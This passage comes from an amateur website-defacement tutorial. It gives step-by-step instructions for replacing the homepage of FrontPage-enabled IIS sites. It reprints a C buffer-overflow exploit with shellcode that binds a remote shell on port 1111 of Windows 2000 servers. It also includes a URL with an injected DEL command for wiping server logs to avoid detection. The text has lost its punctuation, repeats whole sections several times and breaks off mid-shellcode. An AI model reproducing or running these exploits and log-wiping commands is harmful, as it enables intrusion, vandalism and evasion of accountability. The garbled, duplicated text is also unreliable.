cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 13
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 14
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
